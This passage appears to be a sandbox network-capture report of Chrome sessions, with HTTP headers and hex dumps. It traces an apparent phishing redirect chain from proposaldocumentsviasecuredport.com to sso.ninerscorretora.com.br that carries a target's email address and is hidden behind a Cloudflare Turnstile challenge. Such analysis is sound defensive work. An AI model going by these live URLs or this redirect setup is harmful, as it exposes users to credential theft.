                                                        2025-03-25 20:29:26 UTC80INData Raw: 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                        Data Ascii: hile trying to use an ErrorDocument to handle the request.</p></body></html>
                                                        2025-03-25 20:29:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.449741172.67.192.251443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:26 UTC922OUTGET /cdn-cgi/challenge-platform/h/b/jsd/r/0.9880444760699761:1742930777:v0BwmuIV3nHTcJ9doLgIeqC4946_BfI3JSB4KgVDHmw/9261290858884283 HTTP/1.1
                                                        Host: proposaldocumentsviasecuredport.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
                                                        2025-03-25 20:29:26 UTC784INHTTP/1.1 405 Method Not Allowed
                                                        Date: Tue, 25 Mar 2025 20:29:26 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        allow: POST
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7jbkxu4mns%2FD4i7vTYCTE8WTuUHzvYIXuWy8oFxgOXK67DzEgbSvqmqBnk%2FzwMzaDTbiAZE0c1pelBWVavwbhN%2F%2B5kK8HCPfi02O7k64So8ofCD8pL0PAUt%2FAtF11x%2Froalc%2F9qkIpEbWB6VewJtpiQHJfNJWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926129116b7652c6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=101525&min_rtt=100430&rtt_var=22834&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2895&recv_bytes=1494&delivery_rate=35908&cwnd=248&unsent_bytes=0&cid=1e2b26a890707385&ts=262&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449747103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:31 UTC757OUTGET /?mjalaytm&email=john.smith@microsoft.com HTTP/1.1
                                                        Host: sso.ninerscorretora.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://proposaldocumentsviasecuredport.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:31 UTC453INHTTP/1.1 302 Found
                                                        Set-Cookie: qPdM=jYCRkos9k5Z0; path=/; samesite=none; secure; httponly
                                                        Set-Cookie: qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; path=/; samesite=none; secure; httponly
                                                        location: /?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com
                                                        Date: Tue, 25 Mar 2025 20:29:31 GMT
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2025-03-25 20:29:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.449746103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:31 UTC953OUTGET /?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com HTTP/1.1
                                                        Host: sso.ninerscorretora.com.br
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Referer: https://proposaldocumentsviasecuredport.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
                                                        2025-03-25 20:29:32 UTC142INHTTP/1.1 200 OK
                                                        Content-Type: text/html;charset=UTF-8
                                                        Date: Tue, 25 Mar 2025 20:29:31 GMT
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2025-03-25 20:29:32 UTC3272INData Raw: 63 62 63 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 0a 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d
                                                        Data Ascii: cbc<!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.449749104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:32 UTC626OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://sso.ninerscorretora.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:32 UTC386INHTTP/1.1 302 Found
                                                        Date: Tue, 25 Mar 2025 20:29:32 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                        cross-origin-resource-policy: cross-origin
                                                        location: /turnstile/v0/b/708f7a809116/api.js
                                                        Server: cloudflare
                                                        CF-RAY: 92612936fc6fc425-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.449750104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:32 UTC610OUTGET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://sso.ninerscorretora.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:33 UTC471INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:33 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 48123
                                                        Connection: close
                                                        accept-ranges: bytes
                                                        last-modified: Tue, 18 Mar 2025 12:36:20 GMT
                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                        access-control-allow-origin: *
                                                        cross-origin-resource-policy: cross-origin
                                                        Server: cloudflare
                                                        CF-RAY: 9261293a1ff55e4b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:33 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                        Data Ascii: "use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                                        2025-03-25 20:29:33 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                        Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
                                                        2025-03-25 20:29:33 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                        Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)||Bt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
                                                        2025-03-25 20:29:33 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
                                                        2025-03-25 20:29:33 UTC1369INData Raw: 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 5a 7c 7c 28 5a 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72 3d 22 72
                                                        Data Ascii: anual",e.Auto="auto"})(Z||(Z={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce||(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q||(Q={}));var me;(function(e){e.Render="r
                                                        2025-03-25 20:29:33 UTC1369INData Raw: 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29
                                                        Data Ascii: tion pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"||Nr.test(e)
                                                        2025-03-25 20:29:33 UTC1369INData Raw: 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 66 62 44
                                                        Data Ascii: "ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"fbD
                                                        2025-03-25 20:29:33 UTC1369INData Raw: 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 65 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74
                                                        Data Ascii: .setPrototypeOf||function(o,c){return o.__proto__=c,o},ee(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writ
                                                        2025-03-25 20:29:33 UTC1369INData Raw: 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 65 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72
                                                        Data Ascii: nfigurable:!0}}),ee(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"||typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this,ar
                                                        2025-03-25 20:29:33 UTC1369INData Raw: 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 62 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b
                                                        Data Ascii: tion(e,t,a){var o=Tt(t.params,!1),c="h/".concat("b","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(a);


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.449751104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:33 UTC851OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/ HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: iframe
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://sso.ninerscorretora.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:33 UTC1297INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 28125
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                        content-security-policy: default-src 'none'; script-src 'nonce-MCDc5vH7MAyTcbV6' 'unsafe-eval'; script-src-attr 'none'; worker-src blob:; style-src 'unsafe-inline'; img-src 'self'; connect-src 'self'; frame-src 'self' blob:; child-src 'self' blob:; form-action 'none'; base-uri 'self'; sandbox allow-same-origin allow-scripts allow-popups allow-forms
                                                        cross-origin-embedder-policy: require-corp
                                                        cross-origin-opener-policy: same-origin
                                                        cross-origin-resource-policy: cross-origin
                                                        origin-agent-cluster: ?1
